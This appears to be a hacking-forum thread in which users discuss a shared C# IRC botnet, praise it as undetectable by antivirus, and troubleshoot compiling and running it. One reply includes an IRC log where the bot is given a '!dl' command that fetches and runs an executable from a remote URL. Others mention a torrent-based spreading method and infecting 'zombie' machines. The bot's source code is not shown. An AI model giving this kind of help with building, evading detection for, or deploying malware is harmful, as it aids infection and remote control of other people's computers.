YAY FOR BUMBING AN OLD THREAD YAYAYYA LETS ALL DO IT
awesome stuff, thanks man :)
heyho totfx what hooks are you using for keeping the bot save or undetected or w/e?
I still can't believe this is FUD on build. I added a botkiller function and am using it on my own IRC server.
18:07 02-01-2011 Malwares-in.net is down..
looks nice, i will test it later (:

thanks for sharing (:
Thanks for the post.

Didn't have much luck compiling it in Visual C# 2005 (about 16 errors), gonna try it with Visual Studio 2010 next.

copy / paste errors here I'll help you to fix it.
Thank you t0fx.

To eliminate any confusion and to exclude possible causes such as a weirdass installation, i've got a fresh windows XP installed in a VMware, installed Visual C# 2005, dotnet 3.5, and then loaded your source.

Changed only the variables you designated in the instructions, and the following occurred:

Imageshack sshot

Alternatively, here is the copy paste as requested:Spoiler (Click to View)

The errors are spread across the whole project, which led me to believe the language itself is missing some addon (dotnet 4?) or another version.

***Update: I've installed Visual Studio 2010 on a fresh XP VMware image. When opening the project, it offers to convert the reference of Dotnet 2 to Dotnet 4. Done so, and the bot compiles without a problem (hurray!). Connects as well and able to !login.

However, when giving the !dl <url> command, an error occurs and the bot closes down. Here's a screenshot of the JIT-debugger of said error, I hope it will contribute to any future versions of this bot, as I really like the functions it provides.

The problem comes from the temp path, maybe it's because of the vmware.

Hmmmm, that's possible.

By now, i have every Visual Studio ever made and would like to know which one you used to create it. I mean, if I recreate the same enviroment, it -should- operate normally :)

I'm fanatic about getting this one to work, mostly due to the torrent function (which, if used correctly, should be the best non-manual spreader-method of all)

It was developed with visual studio 2008 and .net framework 2.0

Thank you t0fx.

I've installed VS2008+.net FW 2.0 and compiled it. No errors, a nice clean built. Then I ran it and it logged into the irc-server. After the login, the following happens:

Code
[13:38] <Ehkz> !login password
[13:38] <[USA|XP|6344|USER-65A183C45C7]> Ready boss!
[13:38] <Ehkz> !dl http://removedtheurlfromthiscodeblock.com/winzip.exe
[13:42] [USA|XP|6344|USER-65A183C45C7] [[email protected]] quits irc. (Ping timeout)

No errors on the slave machine (think the previous errors might've been due to compiling with VS2010). Tried multiple configurations, with various .net redist versions. It just....quits the moment I give it a download command :/
would be nice except that the zombie comp needs to have net framework installed to get infected -.-
I can't get shitcash to work.. i'll send you a pm :0
